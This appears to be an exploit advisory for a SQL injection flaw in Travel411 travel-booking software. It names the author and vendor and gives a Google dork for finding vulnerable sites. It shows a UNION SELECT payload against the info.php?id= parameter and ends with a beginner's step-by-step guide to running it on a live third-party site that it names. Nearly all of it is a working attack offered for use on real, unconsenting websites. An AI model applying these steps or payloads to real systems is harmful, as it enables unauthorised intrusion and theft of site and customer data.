SQL Injection Vulnerability Found in Travel411: Live example

SQL Injection Vulnerability Found in www.travel411.com: Live example

Greetz fly to Caddy-Dz

####

# Exploit Title: Travel411 SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com
# Category:: webapps
# Google dork: intext:"Powered by Travel411.com"
# Tested on: [Windows Vista Edition Intégrale]
# Vendor: http://www.travel411.com/
####

## ExPLo!T:

||>> Find Any File Like (info.php?id=) or (reservations.php?id=)

# http://127.0.0.1/info.php?id=SQLI

# http://127.0.0.1/info.php?id=-00030+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15--

###

Let me make it more simple.

Step 1: Open google.com

Step 2: Tpye intext:"Powered by Travel411.com"

Step 3: From the search result, find any link looks like info.php?id= or reservations.php?id=

Step 4: Open that link. I found below link:

www.hotels.net411.com/info.php?id=00012

Step 5: Replace 00012 from link and copy paste

-00030+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15--

and press enter. BOOOMM..Site is vulnerable to SQLi attack